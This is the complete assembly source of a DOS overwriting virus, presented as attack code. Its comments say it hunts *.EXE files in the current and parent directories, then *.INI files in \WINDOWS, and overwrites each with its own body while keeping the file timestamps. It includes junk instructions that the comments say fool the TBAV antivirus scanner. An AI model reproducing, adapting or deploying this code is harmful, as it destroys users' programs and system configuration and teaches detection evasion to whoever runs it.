.model tiny .radix 16 ; lets use hex .code Org 100h ; This makes it *.COM start: Mov Si,Si Mov Ax, offset filemask1 ; This does nothing for the virus Rol Ax,1 ; but fools the heck out of Tbav Lea Dx, [filemask1] ; Point Dx To FileMask Mov Ah, 4Eh ; Find First Match Getbad1: Int 21h ; Let Dos Do It Jb start2 ; If No Matches Get Out Mov Dl, 9Eh ; Found One, Point To The FileName Mov Dh, 00h Mov Cl, 7Ah ; This loads 7a04 into ax Xchg Ah, Cl ; shr makes 7a04 into 3d02 Mov Al, 04h ; ' ' Shr Ax,1 ; Open The File Up Int 21h ; Let Dos Do It Xchg Bx, Ax ; Put File Handle In Bx Mov Ah,3f ; Read file Mov Cx,4 ; Read 4 bytes lea dx,[return_bytes] ; Load the offset dx int 21 lea di,[return_bytes] ; Load the offset of ; the fourth byte ; we just read into ; the virus cmp byte ptr ds:[di],8bh ; je nxtmatch1 ; If so assume infected, ; close file, and run ; infection cycle again Mov Ax,4202 ; Check file size Xor Cx,Cx ; clear these registers Xor dx,dx ; '' '' Int 21 ; Dos finds the end of the file cmp Ax,1710 ; Returns the value in Ax jb nxtmatch1 ; if smaller that 6000 jump to next Xor Cx,Cx ; We have to move the file pointer Xor dx,dx ; back to the start of the victum Mov Ax,4200 Int 21 Mov Al,0 ; Get and push the date Mov Ah,0aeh ; ' ' Ror Ah,1 ; ' ' Int 21h ; ' ' Push Cx ; ' ' Push dx ; ' ' Xor Dl,Dl ; gotta keep those register straight Mov dx, 0200h ; Start Writing At 0100h dec Dh ; trying to be a little trickey Mov Cx, 0FFFh ; Write the virus Mov Ah, 40h ; Write File Int 21h ; Let Dos Do It Mov Al,1 ; pop and set the date time Mov Ah,0aeh ; ' ' Ror Ah,1 ; Pop dx ; ' ' Pop Cx ; ' ' Int 21h ; ' ' Mov Ah, 3Eh ; Close File Int 21h ; Let Dos do it Xor Cx,Cx ; Clear these two before going Xor Ax,Ax ; any further ;jmp nxtmatch2 NxtMatch1: Mov Ah, 3Eh ; Close File Int 21h ; Let Dos do it Mov Ah, 4Fh ; Find Next Match jmp Getbad1 ; Call To Start the overwrite start2: push cs ; This part of the code performs pop ds ; the simple method of directory Mov dx, offset Path_name1 ; changes cd.. Mov Ah,3bh int 21 ; Dos helps us nop nop jc start3 ; If we can't change exit nop nop jmp start start3: push cs ; This part of the code performs pop ds ; the simple method of directory Mov dx, offset Path_name ; changes to windows Mov Ah,3bh int 21 ; Dos helps us jc error ; If we can't change exit Mov Si,Si Mov Ax, offset filemask2 ; This does nothing for the virus Rol Ax,1 ; but fools the heck out of Tbav Lea Dx, [filemask2] ; Point Dx To FileMask Mov Ah, 4Eh ; Find First Match Getbad2: Int 21h ; Let Dos Do It Jb Outahere2 ; If No Matches Get Out Mov Dl, 9Eh ; Found One, Point To The FileName Mov Dh, 00h Mov Cl, 7Ah ; This loads 7a04 into ax Xchg Ah, Cl ; shr makes 7a04 into 3d02 Mov Al, 04h ; ' ' Shr Ax,1 ; Open The File Up Int 21h ; Let Dos Do It Xchg Bx, Ax ; Put File Handle In Bx Mov Ah,3f ; Read file Mov Cx,4 ; Read 4 bytes lea dx,[return_bytes] ; Load the offset dx int 21 lea di,[return_bytes] ; Load the offset of ; the fourth byte ; we just read into ; the virus cmp byte ptr ds:[di],8bh ; je nxtmatch2 ; If so assume infected, ; close file, and run ; infection cycle again Mov Ax,4202 ; Check file size Xor Cx,Cx ; Clear these registers Xor dx,dx ; '' '' Int 21 ; Dos finds the end of the file cmp Ax,0009h ; Returns the value in Ax jb nxtmatch2 ; if smaller that 6000 jump to next Xor Cx,Cx ; We have to move the file pointer Xor dx,dx ; back to the start of the victum Mov Ax,4200 Int 21 Mov Al,0 ; Get and push the date Mov Ah,0aeh ; ' ' Ror Ah,1 ; ' ' Int 21h ; ' ' Push Cx ; ' ' Push dx ; ' ' Xor Dl,Dl ; gotta keep those register straight Mov dx, 0200h ; Start Writing At 0100h dec Dh ; trying to be a little trickey Mov Cx, 3000h ; Write the virus Mov Ah, 40h ; Write File Int 21h ; Let Dos Do It Mov Al,1 ; pop and set the date time Mov Ah,0aeh ; ' ' Ror Ah,1 ; Pop dx ; ' ' Pop Cx ; ' ' Int 21h ; ' ' Mov Ah, 3Eh ; Close File Int 21h ; Let Dos do it Xor Cx,Cx ; Clear these two before going Xor Ax,Ax ; any further jmp nxtmatch2 NxtMatch2: Mov Ah, 3Eh ; Close File Int 21h ; Let Dos do it Mov Ah, 4Fh ; Find Next Match jmp Getbad2 ; Call To Start the overwrite outahere2: ret error: ret Filemask1: db '*.EXE',0 Filemask2: db '*.INI',0 Path_name: db '\WINDOWS',0 path_name1: db '..',0 return_bytes: dw ? End start End code